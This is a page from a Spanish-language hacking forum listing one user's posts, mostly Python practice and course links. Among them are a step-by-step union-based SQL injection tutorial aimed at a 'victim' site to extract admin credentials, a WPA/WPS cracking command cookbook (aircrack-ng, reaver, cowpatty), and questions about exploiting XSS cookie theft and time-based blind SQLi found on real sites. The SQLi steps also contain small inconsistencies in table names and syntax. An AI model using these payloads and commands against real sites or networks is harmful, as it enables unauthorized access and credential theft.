Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - TeNeX

#21
Base de Datos / Re:MySQL minitutorial parte 2
Marzo 18, 2013, 01:57:36 PM
Buen aporte, se agradece :)
#22
Perl / Re:[Perl] HexNow 0.1
Marzo 09, 2013, 07:20:49 PM
Ese hecky deberia hacer un libro de "python desde cero hasta forensics" pero se cotiza
#23
En backtrack tambien hay una tool wp-scan que te deja hacer bruteforce pero es lentisimo y como ya dijeron todo depende del diccionario... Buen aporte thks y suerte
#24
Si, lo mismo me paso, y tambien con easy-creds
#25
Dudas y pedidos generales / Re:sin wifi every were
Febrero 20, 2013, 02:57:44 PM
Tambien hay mac changer para win, y hay un prog que vi publicado aqui no recuerdo
El nombre pero te da una nueva mac address cada que reinicias :p suerte
#26
Bugs y Exploits / Re:Back-Connect con shell
Febrero 18, 2013, 05:13:50 AM
Muy buen aporte, seria mucha molestia un edit y que proveeyeras la shel utilizada? O algunas otras?
#27
Dudas y pedidos generales / [SOLUCIONADO] Duda XSS
Febrero 10, 2013, 04:03:30 AM
Buenas, en un webmail, me enconré con unos xss que yo les digo "raros" uno es por post y el otro es por get... por post me imagino que debo usar un proxy para poder editar y enviar el xss por post... mi duda es que los marca en el evento "onmouseover" y si soy honesto creo que necesitaría algunos ejemplos.

intento por get failed:
Código: php
https://login.server.net/index.php?clearcookies=1%27%3E%3Ca+onmouseover%3Dalert%28document.cookie%29%3Exxs%3C%2Fa%3E&app=wbe


y bueno acunetix dice esto:

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(981263) bad='

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(908631) bad='

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(907592) bad='


username

- URL encoded POST input username was set to tsklhfyf%40server.com.mx" onmouseover=prompt(910804) bad="
#28
Pentesting / SQLi Básico
Febrero 07, 2013, 10:50:43 PM
Buenas, les traigo tambien este "mini tuto" que hice basado en unos videos que ví espero les sirva para ir iniciando

SQLI Beginners

- verificamos en la url de la victima si es vulnerable a sqli realizando una busqueda en su sitio web, y colocando una comilla al final No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'  <- si nos arroja un resultado del tipo "verifique su sintaxis" significa que es vulnerable

- después de esto utilizando la sentencia "order by" sacaremos el num de columnas colocando un "-" despues del singo de "=", dos guiones al final de la sentencia, quedando de la siguiente manera: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta order by [numero aleatorio]--

- enla parte de "numero aleatorio" irémos probando numeros como 10,11,12,13 y así sucesivamente, si no sucede nada intentamos con un numero mayor, hasta que obtengamos un error... lo cual significará que el numero de columnas será el numero anterior al error es decir:  si en 13 obtuvimos el error entonces el numero de columnas será 12

- ahora encontraremos los numeros vulnerables, esto lo lograremos con "union all select numero de columnas" y -- al final, recordemos que el numero de columnas lo obtuvimos en el paso anterior, quedando así:
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11,12--

- ya habrémos obtenido una serie de numeros... ¿como saber cual usar y para que usarlo? simple, el (o los) numero que aparezca como si fuera un enlace (subrayado) será el que nos permitirá inyectar

- ahora suponiendo que el numero vulnerable fue el 6, sacaremos ahora la version de la base de datos con "@@version" quedando así:
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,@@version,7,8,9,10,11,12--

La version es inportante pues de ser menor a 5.0 tendríamos que usar bsqli

- ahora sacaremos el nombre de las tablas, para ello cambiaremos @@version por table_name  y despues del ultimo numero colocaremos "from information_schema.tables--"
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,table_name,7,8,9,10,11,12 from information_schema.tables--

- en los resultados arrojados buscamos la tabla que nos interesa accesar, en este caso la de adminitrador... suponiendo qeu se llame "tbadmin" pasaremos a convertir el nombre de la tabla que nos interesa en ascii

www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,column_name,7,8,9,10,11,12 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

116 = t
98  = b
108 = l
97  = a
100 = d
109 = m
105 = i
110 = n

ya tenemos la información... ahora vamos a scar de las tablas "username" y "password" algunos datos

- vamos a escribir en lugar de "column_name" concat(username,0x3a,password) y despues del 12 vamos a escribir "from tbladmin"

www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,concat(username.0x3a,password),7,8,9,10,11,12 from tbladmin--

esto nos arrojará el usuario y el password

- ahora tenemos que encontrar la pagina del administrador para probar el login y el password

By TeNeX
#29
Seguridad Wireless / Re:wifi cook book
Febrero 07, 2013, 10:41:43 PM
:) gracias, me tarde un ratito en hacer esta recopilación pero me da gústo saber que si les agrada, estoy buscando la que hice de sqli para sharearla
#30
Seguridad Wireless / wifi cook book
Febrero 07, 2013, 08:40:53 PM
Les traigo este aporte, es una recopilación que hice de varios ataques, procesamiento/generación de diccionarios  etc

Cracking WPA
* test with wireshark all your networks around with this filter
wps.wifi_protected_setup_state == 2

# airmon-ng start wlan0
# wireshark mon0&

Importar diccionario para WPA con airolib-ng
airolib-ng [db_name] [option [param]]

#airolib-ng crackwpa --import passwd /ruta/del/diccionario.txt
#airolib-ng crackwpa --import essid /archivo/con/el/essid
#airolib-ng crackwpa --stats
#airolib-ng crackwpa --clean all
#airolib-ng crackwpa --batch
#airolib-ng crackwpa --verify all
#aircrack-ng -r crackwpa archivo.cap

Cowpatty
*si el essid contiene espacios va entre comillas
*para hashear un diccionario se usa genpmk

#cowpatty -s [ESSID] -r archivo.cap -f /ruta/del/diccionario.txt
#cowpatty -s [ESSID] -r wpa.cap -d /ruta/del/diccionario/hasheado

Genpmk
*Generar el diccionario precomputado (hashes) para cowpatty, pyrt, etc
*Tener en cuenta que el argumento de -d podría no existir y se generaría

#genpmk -s [ESSID] -d /ruta/del/diccionario_en_Hash -f diccionario.txt
#genpmk -s [ESSID] -d [SSID] -f diccionario.txt

***Probar Contraseña***

# wpa_passphrase [ESSID] [password] > wpa.conf
# wpa_supplicant -Dwext -iwlan0 -c /ruta/del/wpa.conf

Pyrt

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt
#pyrt -e [essid] create_essid
#pyrt -f [diccionario.txt] import_passwords
#pyrt batchprocess
#aircrack-ng -w dict.txt file.cap
#airolib-ng testdb -import essid [essid]
#pyrt -e [essid] -f testdb export_hashdb
#aircrack-ng -r testdb file.cap


***DICCIONARIOS***

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt


pyrt -e [essid] -f [dictionary.txt] passthrough | cowpatty -d - -r [file.cap]

-s [essid]

Reaver

*To use reaver you need to check if victim has wps enabled and is chiper with

wpa
*then enable monitor mode and with mon0 or your new interface sniff with

wireshark and set filter to: wps.wifi_protected_setup_state == 2
*Then you got the victims with wps vuln
*Source: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

# airmon-ng start wlan0
# airodump mon0  <- to find target
# reaver -i mon0 -b [Victim_BSSID] -vv


Fakeauth

# aireplay-ng --fakeauth 10 -e [ESSID]  mon0
# aireplay-ng --fakeauth 10 -e [ESSID] -h [my mac or Spoofed_MAC_ADDRESS] mon0

Si se captura un xor packet

# airodump-ng --channel 1 mon0 --bssid [AP_Victim_MAC] --write [name.cap]
# aireplay-ng --fakeauth 10 mon0 -e [ESSID] -y [FILE.XOR]
#31
Creo que se refiere a que tiene un sitio con joomla pero no sabe como atacarlo o hacer uso de los exploits que encuentras en la red para joomla  es casi lo mismo que me pasa con wordpress
Y tal vez quiere ejemplos de uso
#32
Dudas y pedidos generales / Re:Duda BSQLi
Febrero 06, 2013, 06:22:22 PM
hum.. nunca se me ocurrió con esos... de hecho intenté con el sqlmap pero nadamás nop
mucha sgracias intentaré con esos a ver que onda :P
#33
Dudas y pedidos generales / [SOLUCIONADO] Duda BSQLi
Febrero 06, 2013, 06:15:03 PM
Buenas, espero esten bien, tengo una duda... encontre un Blind SQLi pero es en un formulario, especificamente en un checkbox... mi duda es que... no me explico como se podría explotar...

el código del aspx es este

Código: php
 <div style="float:right; color:#404040;">
                                                 <input id="MainContent_chkAviso" type="checkbox" name="ctl00$MainContent$chkAviso" /><label for="MainContent_chkAviso">De acuerdo con el </label>
                                                 <a class="vwAviso" href="AvisoPrivacidad.pdf" title="Aviso de Privacidad">Aviso de Privacidad</a>


y acunetix dice esto:

URL encoded POST input ctl00%24MainContent%24chkAviso was set to 1'; waitfor delay '0:0:2.792' --

#34
Seguridad Wireless / Re:Wlan Security Videos
Febrero 05, 2013, 02:05:01 AM
Si, pero es indú, no por eso va a ser mejor pero este cuate habla muy claro dificilmente no le entenderias y mas si sigues la parte practica :)
#35
HOla :) disculpa pero haces mención a una parte del codigo qeu "esta coloreada" y no logro verla ... a cuales lineas te referías?
#36
Seguridad Wireless / Wlan Security Videos
Febrero 02, 2013, 03:54:29 AM
 :) Hola a todos, es la primera vez que posteo, y que mejor que para aportar algo!
les traigo el link del Securitytube Wifi Megapremier en lo personal estos cursos me agradan, he visto hasta el video 7 y va muy muy lento creo que puede abarcar mas pero es realmente "from scratch".

He estado buscando sus otros cursos como el de ASM, Python, Iphone, Metasploit etc, pero la verdad es que no he encontrado otros excepto el de metasploit tambien, pero bueno los demás si alguien tiene alguno seria bueno que lo shareara


Descarga directa ISO No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

LOG DE MODERACION
ENLACE ROTO REMOVIDO 14.03.2015 CL0UDSWX
#37
Talleres Underc0de / Re:Taller de Python #1
Enero 26, 2013, 04:34:11 PM
primera practica

#/usr/bin/env python

a=10
ima=7i
b=ima+a
name="TeNeX"
print name + "ha sumado " + a + "+" + ima + "=" + b

no sirven los imaginarios :( al principio creí que era porque arrastro viejas costumbres de C osea el ";" al final de cada línea

D:\Practicas python>python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  File "practica1.py", line 4
    ima=7i;
         ^
SyntaxError: invalid syntax

D:\Practicas python>python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  File "practica1.py", line 4
    ima=7i
         ^
SyntaxError: invalid syntax

---------------------------------------------------------------------------------

Segundo programa

#! /usr/bin/pyhton27
# -*- coding: utf-8 -*-

a=273
b=4
c=97
d=5
e=1200
f=6
g=1470
h=400
i=2
j=49
k=15
l=50
m=37


print "el resultado es: " + a * b + c * d - e / f
print "el resultado es: " + g / d + h * i - j**i
print "el resultado es: " + k**d / l - m * b



D:\Practicas python>python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  File "practica2.py", line 18
SyntaxError: Non-ASCII character '\xe2' in file No tienes permitido ver los links. Registrarse o Entrar a mi cuenta on line 18, but no encoding declared; see No tienes permitido ver los links. Registrarse o Entrar a mi cuenta for deta

D:\Practicas python>python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  File "practica2.py", line 18
SyntaxError: Non-ASCII character '\xe2' in file No tienes permitido ver los links. Registrarse o Entrar a mi cuenta on line 18, but no encoding declared; see No tienes permitido ver los links. Registrarse o Entrar a mi cuenta for deta

D:\Practicas python>python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  File "practica2.py", line 19
    print "el resultado es: " + a * b + c * d ÔÇô e / f
                                              ^
SyntaxError: invalid syntax

D:\Practicas python>python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Traceback (most recent call last):
  File "practica2.py", line 19, in <module>
    print "el resultado es: " + a * b + c * d - e / f
TypeError: cannot concatenate 'str' and 'int' objects

CORRECCIÓN!!!

la practica 2 la corregí y esque en mi mente seguía concatenando resultados con el "+" y leyendo nuevamente el tuto noté que utilizabas ","

asi que posteo como quedó el código y el resultado arrojado:


#! /usr/bin/pyhton27
# -*- coding: utf-8 -*-

a=273
b=4
c=97
d=5
e=1200
f=6
g=1470
h=400
i=2
j=49
k=15
l=50
m=37


print "el resultado es: ",(a * b) + (c * d) - (e / f)
print "el resultado es: ",(g / d) + (h * i) - (j**i)
print "el resultado es: ",(k**d) / l - (m * b)

D:\Practicas python>python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
el resultado es:  1377
el resultado es:  -1307
el resultado es:  15039
#38
Muy buen aporte, lamentablemente beef es demasiado lento, hay un tuto para combinarlo con metasploit, pero en mis pruebas a pesar de estar en una lan, es muy lento y rara vez los exploits funcionan,
#39
Talleres Underc0de / Re:Taller de Python #1
Enero 08, 2013, 04:37:11 AM
Man esta excelente, minduda es .. Habia visto que en unos scripts se usaba el header #!/usr/bin/env python

O algo parecido... Que diferencia hay?

Y como sugerencia porque no comenzar con palabras reservadas, sintaxis, etc digo es teoria pero al final es necesaria creo yo para poder saber los comos y porque's
#40
GNU/Linux / Tutoriales Ensamblador para pentest
Enero 07, 2013, 03:06:23 AM
Buenas... este es mi primer aporte... es bastante chafa... en realidad pero bueno, estaba buscando el Securitytube Python Scripting Expert Dvd Download y encontré No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aqui una lista de cursos de programación, sinceramente me gustan los video tutoriales y me tope con el de ASM aunque no encontre el que quería :( pero bueno les comparto lo qu eencontré

Assembley language for Penetration tester
Below are the useful resources to learn Assembley Language for pentesters to start learning Exploit writing

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Linux Assembley

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Programming From the Ground Up

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Iczelion's Win32 Assembly Homepage
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Art of Assembly

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


first 5 chapters is enough

Intel Developer Manuals
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Language Primer for Hackers Videos

Assembly Primer for Hackers (Part 1) System Organization
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 2) Virtual Memory Organization
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 3) GDB Usage Primer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 4) Hello World
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 5) Data Types
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 6) Moving Data
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 7) Working with Strings
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 9) Conditional Branching
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 10) Functions
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Assembly Primer for Hackers (Part 11) Functions Stack
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aqui
y aqu ila fuente de la fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

estoy descargando el SMFE (SecurityTube Metasploit Framework Expert) el cual tambien comparto
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aqui para ustedes